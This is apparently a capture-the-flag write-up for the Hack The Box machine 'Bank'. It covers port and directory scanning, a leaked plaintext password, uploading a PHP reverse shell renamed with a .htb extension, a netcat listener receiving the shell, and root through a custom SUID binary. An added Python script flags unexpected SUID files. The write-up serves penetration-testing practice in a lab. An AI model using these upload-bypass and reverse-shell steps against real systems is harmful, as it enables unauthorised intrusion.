Post

Bank

Bank Linux · Easy - Adventure mode

🔭 Reconnaissance:

┌──(pmartinezr㉿kali)-[~/htb/bank]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.29.200
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-14 19:31 +0100
Nmap scan report for 10.129.29.200
Host is up (0.049s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.16 seconds

bank_login

It is a bank's website, so the very least it will have is a login.

┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 207628
Output File: /home/pmartinezr/reports/http_bank.htb/_26-02-15_18-55-13.txt
Target: http://bank.htb/
[18:55:14] Starting:
[18:55:15] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/
[18:55:16] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[18:55:23] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[19:02:57] 403 -  288B  - /server-status
[19:14:07] 301 -  314B  - /balance-transfer  ->  http://bank.htb/balance-transfer/

Dirsearch turns up several interesting directories, provided you use the right wordlist. balance-transfer is probably the most interesting one.

bank_encrypt_fail

An encryption failure reveals a user

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

bank_christ_account

Now we can log into Chris's account.

bank_debug

Inspecting the ticket page reveals a very obvious attack vector. So we only need to create a revershell.php file and rename it to revershell.htb.

bank_reveshell_revshell.com

Once again I use https://www.revshells.com/

bank_ticket_success

The page indicates that the ticket has been created.

bank_tickets_sent

And the ticket shows up in the My tickets list.

👽 Actions:

┌──(pmartinezr㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.29.200] 37686
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
21:06:47 up  1:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1088): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/$ ls -ltr /home/chris/
total 4
-r--r--r-- 1 chris chris 33 Feb 15 19:34 user.txt
www-data@bank:/$ cat /home/chris/user.txt
a6c2661c3c8bcb6c********
www-data@bank:/$ find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/$ /var/htb/bin/emergency
# whoami
root

The user file is readable by the www-data user, so getting the first flag is trivial. As for privilege escalation, when I look for possible paths with the command find / -perm -u=s -type f 2>/dev/null I find a binary that, when run, turns us into root.
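A defender's counterpart to the find command above, added here and not part of the original writeup: it checks a SUID listing against an assumed baseline of the paths that are SUID on a stock Ubuntu 14.04 host and flags everything else, so a custom helper like /var/htb/bin/emergency stands out. The sample listing is constructed from the output above; the backup-helper path is made up to show the second branch.

```python
"""Flag SUID binaries that are not part of a stock-system baseline (added
example, not from the writeup). BASELINE is an assumption taken from the
packaged SUID helpers seen on a stock Ubuntu 14.04 host."""

BASELINE = frozenset({
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/bin/at",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/pkexec",
    "/usr/bin/newgrp", "/usr/bin/traceroute6.iputils", "/usr/bin/gpasswd",
    "/usr/bin/sudo", "/usr/bin/mtr", "/usr/sbin/uuidd", "/usr/sbin/pppd",
    "/bin/ping", "/bin/ping6", "/bin/su", "/bin/fusermount", "/bin/mount",
    "/bin/umount",
})
# Directories where a packaged SUID helper is at least plausible.
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/")

def parse_find_output(text):
    """One path per non-empty line, as `find / -perm -u=s -type f` prints them."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]

def classify_suid_paths(paths):
    """Return (unexpected, expected); unexpected is a list of (path, reason)."""
    unexpected, expected = [], []
    for path in sorted(set(paths)):
        if path in BASELINE:
            expected.append(path)
        elif not path.startswith(TRUSTED_PREFIXES):
            # A SUID file under /var, /opt, /tmp, /home... deserves immediate review.
            unexpected.append((path, "SUID file outside /usr, /bin and /sbin"))
        else:
            unexpected.append((path, "SUID file not in the package baseline"))
    return unexpected, expected

# Constructed sample: four entries from the writeup's listing plus one made-up path.
SAMPLE_LISTING = """/var/htb/bin/emergency
/usr/bin/sudo
/usr/bin/passwd
/bin/ping
/usr/local/bin/backup-helper
"""

if __name__ == "__main__":
    flagged, _ok = classify_suid_paths(parse_find_output(SAMPLE_LISTING))
    for path, reason in flagged:
        print(f"REVIEW {path}: {reason}")
```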

achivement

This post is licensed under CC BY 4.0 by the author.